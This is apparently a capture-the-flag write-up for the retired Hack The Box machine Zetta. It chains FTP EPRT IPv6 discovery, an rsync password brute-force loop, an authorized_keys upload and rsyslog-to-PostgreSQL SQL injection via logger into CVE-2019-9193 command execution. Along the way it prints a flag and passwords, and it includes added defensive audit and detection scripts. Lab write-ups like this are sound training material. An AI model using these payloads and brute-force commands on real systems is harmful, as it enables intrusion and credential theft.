MACHINE DATA
- IP address: 10.10.10.156
- OS: Linux
- Rating: Hard
- Points: 40
- Phased out: Feb 21st 2020
Initial foothold and user
Nmap reveals only the following services:
- SSH
- FTP
- HTTP
- Any 32-character combination is a valid username and password for the FTP service: this doesn't give access to any files or folders, and the server (PureFTPd) doesn't seem to be vulnerable.
- The webpage mentions RFC 2428, which defines the FXP extension for the FTP protocol: maybe this FTP server supports FXP extensions.
I can connect to port 21 with telnet and type in any 32-character hex sequence as user and password.
Now I can use the EPRT command (defined in RFC 2428) to tell the FTP server that my computer can be contacted on port 26000 for the FXP extensions.
Then I issue the command STOR pass.txt to make use of these FXP extensions.
The file pass.txt is not needed: I only need Zetta to contact my computer on port 26000 over IPv6 so that I can find Zetta's IPv6 address:
And looking at tcpdump output:
I can find that the IPv6 address of Zetta is dead:beef::250:56ff:febd:1dbe
And the next step is to scan Zetta on IPv6:
There is an additional open port that looks interesting.
I can connect to it and find that it is an rsync server used for backup purposes.
So now I can try to copy the /etc/ folder from the remote server to my local computer:
rsync -6 rsync://root@[dead:beef:0:0:250:56ff:febd:1dbe]:8730/etc/* rsync/
Unfortunately the /etc/ folder doesn't reveal any secrets (shadow file or other things), but it contains the rsync configuration file, which has an interesting section:
[home_roy]
path = /home/roy
read only = no
# Authenticate user for security reasons.
uid = roy
gid = roy
auth users = roy
secrets file = /etc/rsyncd.secrets
# Hide home module so that no one tries to access it.
list = false
There is a misconfiguration: the module is not read-only, so the user roy can use rsync to upload files.
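As an added example (not part of the original write-up), here is a small audit script a defender could run over rsyncd.conf to catch exactly this kind of module: writable, hidden with list = false, or exposed without authentication. The [home_roy] module in the sample is the one quoted above; the global port line and the [etc] module are constructed for illustration.

```python
# Added example (not from the write-up): audit rsyncd.conf modules for
# risky settings. The [home_roy] module is the one quoted above; the
# global 'port' line and the [etc] module are constructed for illustration.
import re

SAMPLE_RSYNCD_CONF = """\
port = 8730
[etc]
path = /etc
read only = yes
[home_roy]
path = /home/roy
read only = no
uid = roy
gid = roy
auth users = roy
secrets file = /etc/rsyncd.secrets
list = false
"""

def parse_rsyncd(text):
    """Return {module: {option: value}}; options before any [module] go under None."""
    modules, current = {None: {}}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (no '#' inside values here)
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip()
            modules[current] = {}
        elif "=" in line:
            key, _, value = line.partition("=")
            modules[current][key.strip().lower()] = value.strip().lower()
    return modules

def audit(modules):
    """Return (module, finding) pairs; rsyncd's default is 'read only = yes'."""
    findings = []
    for name, opts in ((n, o) for n, o in modules.items() if n is not None):
        writable = opts.get("read only", "yes") in ("no", "false")
        authed = "auth users" in opts and "secrets file" in opts
        if not authed:
            findings.append((name, "anonymous module: no 'auth users'/'secrets file'"))
        if writable:
            guard = "only the password in rsyncd.secrets" if authed else "nothing"
            findings.append((name, f"writable module ('read only = no'), guarded by {guard}"))
        if opts.get("list") == "false":
            findings.append((name, "'list = false' only hides the module; it is not access control"))
    return findings
```

Run audit(parse_rsyncd(open("/etc/rsyncd.conf").read())) on a real host to list the modules worth a second look.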
The first step is to get a copy of the folder, but I don't have the password of the roy user, so I have to brute-force it with rockyou:
for i in $(head -n 1000 rockyou.txt); do
    echo $i
    echo $i | rsync -6 --password-file=- rsync://roy@[dead:beef:0:0:250:56ff:febd:871]:8730/home_roy/* roy
    if [ $? -eq 0 ]; then
        echo password is $i
        exit 1
    fi
done
After a few minutes I got roy's password, which is computer.
Using rsync I can get a copy of roy's home directory, where I find a .tudu.xml file containing an obscure hint that will be useful later for root escalation:
I can leverage the write permission to upload an authorized_keys file of my choice and use it for SSH authentication:
root@NikITA:~/HTB/Zetta# rsync -6 -a authorized_keys rsync://roy@[dead:beef::250:56ff:febd:871]:8730/home_roy/.ssh/
****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******
You must have explicit, authorized permission to access this rsync
server. Unauthorized attempts and actions to access or use this
system may result in civil and/or criminal penalties.
All activities performed on this device are logged and monitored.
****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ******

@ZE::A staff
This rsync server is solely for access to the zetta master server.
The modules you see are either provided for "Backup access" or for "Cloud sync".

Password:
root@NikITA:~/HTB/Zetta# ssh roy@10.10.10.156
Linux zetta 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64
Last login: Sat Aug 31 15:43:18 2019 from 10.10.14.2
roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
roy@zetta:~$ cat user.txt
a575bdb345f2de0a3172c8282452be91
roy@zetta:~$
That concludes the user escalation for Zetta.
Root escalation
Looking around as the roy user I found a git repo in the /etc/rsyslog.d folder: it contains the rsyslog config file, which has a special configuration to store log messages in a PostgreSQL database. Here is the config:
template(name="sql-syslog" type="list" option.sql="on") {
    constant(value="INSERT INTO systemevents (message, devicereportedtime) values ('")
    property(name="msg")
    constant(value="','")
    property(name="timereported" dateformat="pgsql" date.inUTC="on")
    constant(value="')")
}
# load module
module(load="ompgsql")
# Only forward local7.info for testing.
local7.info action(type="ompgsql" server="localhost" user="postgres" pass="*******" db="Syslog" template="sql-syslog")
I believe there is a way to exploit this by triggering a specially crafted syslog message.
The exploitation requires some effort to find the correct message, so I decided to reproduce the config on my machine and try many combinations until I found a way to execute code.
The basic idea is to use the logger command with the correct facility to send a message with the right quote and escape characters so that SQL commands get executed in PostgreSQL.
For example, I was able to get the version of PostgreSQL with this command:
echo "',NULL); SELECT version();-- " | logger -p local7.info
The version of PostgreSQL will be written in the systemevents table.
The reason for reproducing the setup on my machine is that I can look at the PostgreSQL content, while I don't have any credentials on Zetta for that.
Now that I can execute SQL commands I can leverage CVE-2019-9193, as described on PayloadsAllTheThings, to execute Linux OS commands from inside PostgreSQL.
The original exploit is:
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
But I have to "encapsulate" it in the logger messages like this (please note the special escaping \$$ used so that the apostrophe-delimited argument is correctly sent to PostgreSQL):
echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- " | logger -p local7.info
echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- " | logger -p local7.info
echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ id \$$;-- " | logger -p local7.info
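As an added example (not part of the original write-up), here is a small detector a defender could run over syslog lines to flag messages shaped like the ompgsql template break-out described above: a quote that closes the VALUES list, a stacked statement, a trailing SQL comment, COPY ... FROM PROGRAM, or dollar quoting. The sample log lines are constructed and reuse the payload shapes shown in this post; the scoring weights are an assumption.

```python
# Added example (not from the write-up): flag syslog messages that look
# like they are trying to break out of the rsyslog ompgsql INSERT template
# quoted above. The log lines below are constructed; they reuse the
# payload shapes shown in the write-up.
import re

# Each indicator: (regex, weight, description); weights are an assumption
INDICATORS = [
    (re.compile(r"'\s*,\s*NULL\s*\)", re.I), 3, "closes the quoted value and the VALUES list"),
    (re.compile(r";\s*(select|insert|drop|create|copy|alter)\b", re.I), 3, "stacked SQL statement"),
    (re.compile(r"--\s*$"), 2, "trailing SQL comment swallows the rest of the template"),
    (re.compile(r"\bcopy\b.*\bfrom\s+program\b", re.I), 5, "COPY ... FROM PROGRAM (CVE-2019-9193 style command execution)"),
    (re.compile(r"\$[A-Za-z_]*\$"), 2, "dollar quoting used instead of single quotes"),
]

# Classic BSD syslog line: "Mon DD hh:mm:ss host tag[pid]: message"
SYSLOG_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<tag>[^:\[]+)(\[\d+\])?: (?P<msg>.*)$")

def score_message(msg):
    """Return (score, [descriptions]) for one syslog message body."""
    hits = [(w, d) for rx, w, d in INDICATORS if rx.search(msg)]
    return sum(w for w, _ in hits), [d for _, d in hits]

def scan(lines, threshold=3):
    """Return alerts [(host, tag, score, descriptions)] for lines at/above threshold."""
    alerts = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        score, why = score_message(m.group("msg"))
        if score >= threshold:
            alerts.append((m.group("host"), m.group("tag"), score, why))
    return alerts

SAMPLE_LINES = [  # constructed sample input
    "Aug 31 15:50:01 zetta CRON[1234]: (root) CMD (run-parts /etc/cron.hourly)",
    "Aug 31 15:50:05 zetta roy: ',NULL); SELECT version();-- ",
    "Aug 31 15:50:09 zetta roy: ',NULL); COPY cmd_exec FROM PROGRAM $$ id $$;-- ",
    "Aug 31 15:50:12 zetta sshd[2222]: Accepted publickey for roy from 10.10.14.2 port 51234 ssh2",
    "Aug 31 15:50:20 zetta app: user said 'hello' -- no harm done",
]
```

The tag field tells you which local user or process wrote the message, which is the lead to follow when an alert fires.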
Once I'm able to execute commands I can do anything, like listing the content of folders; with a few ls commands I can find that postgres has a private SSH key, and I can copy it to /tmp and make it world-readable with these commands:
echo "',NULL); DROP TABLE IF EXISTS cmd_exec;-- " | logger -p local7.info
echo "',NULL); CREATE TABLE cmd_exec(cmd_output text);-- " | logger -p local7.info
echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ cp /var/lib/postgresql/.ssh/id_rsa /tmp/a \$$;-- " | logger -p local7.info
echo "',NULL); COPY cmd_exec FROM PROGRAM \$$ chmod 777 /tmp/a \$$;-- " | logger -p local7.info
The content of the id_rsa key is:
And I can use it to connect to Zetta as the postgres user:
Once inside as the postgres user I can look at the shell history and find the command that originally created the postgres user:
So the postgres user has a password: sup3rs3cur3p4ass@postgres
Remembering the hint in the .tudu.xml file, I can guess that the password of the root user is sup3rs3cur3p4ass@root
And, yes it is: